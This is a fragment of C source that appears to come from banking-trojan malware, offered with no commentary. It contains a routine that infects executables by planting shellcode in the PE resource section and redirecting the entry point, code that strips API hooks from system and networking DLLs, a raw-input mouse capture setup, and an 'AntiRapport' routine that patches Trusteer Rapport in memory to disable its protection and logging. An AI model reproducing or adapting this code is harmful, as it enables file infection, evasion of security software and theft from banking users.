VOID UnhookLibs()
{
UnhookModuleExports(MyGetModuleBase("ntdll"));
UnhookModuleExports(MyGetModuleBase("kernel32"));
UnhookModuleExports(MyGetModuleBase("mswsock"));
UnhookModuleExports(MyGetModuleBase("ws2_32"));
UnhookModuleExports(MyGetModuleBase("wsock32"));
UnhookModuleExports(MyGetModuleBase("wininet"));
if (!pGetModuleHandleA("ieframe.dll"))
{
UnhookModuleExports(MyGetModuleBase("user32.dll"));
}
UnhookModuleExports(MyGetModuleBase("gdi32.dll"));
}
static void cleanup_window(void)
{
if (raw_hwnd)
{
MSG Msg;
pDestroyWindow(raw_hwnd);
while (pPeekMessageA(&Msg, raw_hwnd, 0, 0, PM_REMOVE))
{
pTranslateMessage(&Msg);
pDispatchMessageA(&Msg);
} /* while */
raw_hwnd = 0;
} /* if */
if (class_atom)
{
pUnregisterClassA(class_name, pGetModuleHandleA(NULL));
class_atom = 0;
} /* if */
} /* cleanup_window */
static int init_event_queue(void)
{
HINSTANCE hInstance = pGetModuleHandleA(NULL);
WNDCLASSEX wce;
RAWINPUTDEVICE rid;
ZeroMemory(input_events, sizeof (input_events));
input_events_read = input_events_write = 0;
ZeroMemory(&wce, sizeof (wce));
wce.cbSize = sizeof(WNDCLASSEX);
wce.lpfnWndProc = RawWndProc;
wce.lpszClassName = class_name;
wce.hInstance = hInstance;
class_atom = pRegisterClassExA(&wce);
if (class_atom == 0)
return 0;
raw_hwnd = pCreateWindowExA(0, class_name, win_name, WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, HWND_MESSAGE, NULL, hInstance, NULL);
if (raw_hwnd == NULL)
return 0;
pInitializeCriticalSection(&mutex);
ZeroMemory(&rid, sizeof (rid));
rid.usUsagePage = 1; /* GenericDesktop page */
rid.usUsage = 2; /* GeneralDestop Mouse usage. */
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = raw_hwnd;
if (!pRegisterRawInputDevices(&rid, 1, sizeof (rid)))
{
pDeleteCriticalSection(&mutex);
return 0;
} /* if */
return 1;
} /* init_event_queue */
static bool InfectImage( PVOID data, DWORD dataSize, char *dllPath, char *commandLine )
{
DWORD shellcodeSize = (DWORD)((PUCHAR)&Shellcode_end - (PUCHAR)&Shellcode);
DWORD totalSize = shellcodeSize + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
DBG( "Shellcode size is %d bytes", totalSize);
PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)
((PUCHAR)data + ((PIMAGE_DOS_HEADER)data)->e_lfanew);
PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER)
(headers->FileHeader.SizeOfOptionalHeader +
(PUCHAR)&headers->OptionalHeader);
DWORD numberOfSections = headers->FileHeader.NumberOfSections;
// enumerate sections
for( int i = 0; i < (int)numberOfSections; i++ )
{
// check for resources section
if( !m_memcmp( (char*)§ion->Name, ".rsrc", 5) )
{
if( section->SizeOfRawData < totalSize )
{
DBG( "ERROR: Not enough free space in '.rsrc'" );
return false;
}
// fill shellcode parameters
PSHELLCODE_PARAMS params = (PSHELLCODE_PARAMS)((PUCHAR)data + section->PointerToRawData);
m_memset( params, 0, sizeof(SHELLCODE_PARAMS) );
params->dwAddressofEntryPoint = headers->OptionalHeader.AddressOfEntryPoint;
HMODULE kernel32 = (HMODULE)pGetModuleHandleA("kernel32.dll");
params->f_LoadLibraryA = (func_LoadLibraryA)pGetProcAddress( kernel32, "LoadLibraryA" );
params->f_WinExec = (func_WinExec)pGetProcAddress( kernel32, "WinExec" );
if( commandLine )
m_lstrcpy( params->szCommandLine, commandLine );
m_lstrcpy( params->szDllPath, dllPath );
// copy shellcode
PVOID shellcode = (PVOID)((PUCHAR)params + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1);
m_memcpy( shellcode, Shellcode, shellcodeSize);
// replace address of entry point
headers->OptionalHeader.AddressOfEntryPoint = section->VirtualAddress +
sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
// make section executable
section->Characteristics |= IMAGE_SCN_MEM_EXECUTE;
headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress = NULL;
headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size = 0;
DWORD headerSum = 0, checkSum = 0;
// recalculate checksum
if( pCheckSumMappedFile( data, dataSize, &headerSum, &checkSum ) )
headers->OptionalHeader.CheckSum = checkSum;
else
DBG( "CheckSumMappedFile() ERROR %d", pGetLastError() );
DBG( "OK" );
break;
}
section++;
}
return true;
}
HMODULE MyGetModuleBase(LPCSTR lpDll)
{
HMODULE hDll = (HMODULE)pGetModuleHandleA(lpDll);
return hDll ? hDll : (HMODULE)pLoadLibraryA(lpDll);
}
BOOL AntiRapport()
{
BOOL bRet = FALSE;
UCHAR Buf;
DWORD t;
HMODULE hRapportModule;
LPCSTR lpStr1;
LPCSTR lpStr2;
DWORD dwStr1;
DWORD dwStr2;
PVOID pvLogFix;
PVOID pvFix;
pLoadLibraryA("wininet.dll");
pLoadLibraryA("user32.dll");
hRapportModule =(HMODULE) pGetModuleHandleA("RapportUtil.dll");
if (hRapportModule)
{
lpStr1 = "periodic_checkpoint::periodic_checkpoint_thread";
lpStr2 = ".\\patching_sentry\\periodic_checkpoint.cpp";
dwStr1 = AntiRapportFindStr(hRapportModule,lpStr1,(DWORD)plstrlenA(lpStr1));
if (dwStr1)
{
dwStr2 = AntiRapportFindStr(hRapportModule,lpStr2,(DWORD)plstrlenA(lpStr2));
if (dwStr2)
{
pvFix = AnitRapportFindPushStrs(hRapportModule,dwStr1,dwStr2,&pvLogFix);
if (pvFix)
{
Buf = 0x19;
if (pWriteProcessMemory(pGetCurrentProcess(),pvFix,(PVOID)&Buf,sizeof(Buf),&t))
{
bRet = TRUE;
// DbgPrint(__FUNCTION__"(): rapport protect thread patched at %x\n",pvFix);
}
else
{
//DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
if (pvLogFix)
{
Buf = 0xC3;
if (pWriteProcessMemory(NtCurrentProcess(),pvLogFix,(PVOID)&Buf,sizeof(Buf),&t))
{
// DbgPrint(__FUNCTION__"(): rapport log proc patched at %x\n",pvLogFix);
}
else
{
// DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
}
pSleep(4000);
UnhookLibs();
}
}
}
}
return bRet;
}
